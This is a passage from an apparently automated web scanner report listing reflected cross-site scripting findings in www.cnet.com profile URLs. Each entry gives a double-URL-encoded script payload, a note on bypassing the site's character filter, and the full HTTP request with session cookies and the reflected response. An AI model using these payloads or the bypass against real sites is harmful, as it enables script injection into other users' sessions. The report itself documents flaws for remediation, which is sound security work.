<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>ericaatnews43502<script>alert(1)</script>9ef21427e95's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9003a%253cscript%253ealert%25281%2529%253c%252fscript%253e5de0aaf2877 was submitted in the REST URL parameter 2. This input was echoed as 9003a<script>alert(1)</script>5de0aaf2877 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/ghaff9003a%253cscript%253ealert%25281%2529%253c%252fscript%253e5de0aaf2877/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:34 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:34 GMT Edge-Control: no-cache Cneonction: close Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=957 Connection: Keep-Alive Content-Length: 30966
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>ghaff9003a<script>alert(1)</script>5de0aaf2877's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe0b9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebfe8b4bb932 was submitted in the REST URL parameter 2. This input was echoed as fe0b9"><script>alert(1)</script>bfe8b4bb932 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/ghafffe0b9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebfe8b4bb932/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:33 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:33 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=966 Connection: Keep-Alive Content-Length: 31041
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="ghafffe0b9"><script>alert(1)</script>bfe8b4bb932"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5315a%253cscript%253ealert%25281%2529%253c%252fscript%253ec8b125a94b1 was submitted in the REST URL parameter 2. This input was echoed as 5315a<script>alert(1)</script>c8b125a94b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/harrisonh15315a%253cscript%253ealert%25281%2529%253c%252fscript%253ec8b125a94b1/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:34 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:34 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=951 Connection: Keep-Alive Content-Length: 31094
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>harrisonh15315a<script>alert(1)</script>c8b125a94b1's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 324d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee8fe572996d was submitted in the REST URL parameter 2. This input was echoed as 324d3"><script>alert(1)</script>e8fe572996d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/harrisonh1324d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee8fe572996d/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:32 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:32 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=955 Connection: Keep-Alive Content-Length: 31066
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="harrisonh1324d3"><script>alert(1)</script>e8fe572996d"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bc486%253cscript%253ealert%25281%2529%253c%252fscript%253ebd6cd5eeb1 was submitted in the REST URL parameter 2. This input was echoed as bc486<script>alert(1)</script>bd6cd5eeb1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jamesurquhartbc486%253cscript%253ealert%25281%2529%253c%252fscript%253ebd6cd5eeb1/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:33 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:33 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=996 Connection: Keep-Alive Content-Length: 31079
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>jamesurquhartbc486<script>alert(1)</script>bd6cd5eeb1's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cebc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb3d1020d085 was submitted in the REST URL parameter 2. This input was echoed as 7cebc"><script>alert(1)</script>b3d1020d085 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jamesurquhart7cebc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb3d1020d085/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:31 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:31 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=982 Connection: Keep-Alive Content-Length: 31131
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="jamesurquhart7cebc"><script>alert(1)</script>b3d1020d085"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 930b3%253cscript%253ealert%25281%2529%253c%252fscript%253e4aaf9b515c9 was submitted in the REST URL parameter 2. This input was echoed as 930b3<script>alert(1)</script>4aaf9b515c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jbakalar930b3%253cscript%253ealert%25281%2529%253c%252fscript%253e4aaf9b515c9/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:23 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:23 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=940 Connection: Keep-Alive Content-Length: 31040
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>jbakalar930b3<script>alert(1)</script>4aaf9b515c9's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dfdf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb578f3e55 was submitted in the REST URL parameter 2. This input was echoed as 1dfdf"><script>alert(1)</script>bb578f3e55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jbakalar1dfdf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb578f3e55/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:21 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:21 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=989 Connection: Keep-Alive Content-Length: 31097
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="jbakalar1dfdf"><script>alert(1)</script>bb578f3e55"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a8ade%253cscript%253ealert%25281%2529%253c%252fscript%253e688f5566abe was submitted in the REST URL parameter 2. This input was echoed as a8ade<script>alert(1)</script>688f5566abe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jenguevina8ade%253cscript%253ealert%25281%2529%253c%252fscript%253e688f5566abe/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:07:26 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:07:26 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=995 Connection: Keep-Alive Content-Length: 31034
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>jenguevina8ade<script>alert(1)</script>688f5566abe's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1edb0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eab7a805cdda was submitted in the REST URL parameter 2. This input was echoed as 1edb0"><script>alert(1)</script>ab7a805cdda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jenguevin1edb0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eab7a805cdda/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:07:25 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:07:25 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=867 Connection: Keep-Alive Content-Length: 31037
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="jenguevin1edb0"><script>alert(1)</script>ab7a805cdda"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14dbe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57e94eac02b was submitted in the REST URL parameter 2. This input was echoed as 14dbe"><script>alert(1)</script>57e94eac02b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/jim+kerstetter14dbe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57e94eac02b/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
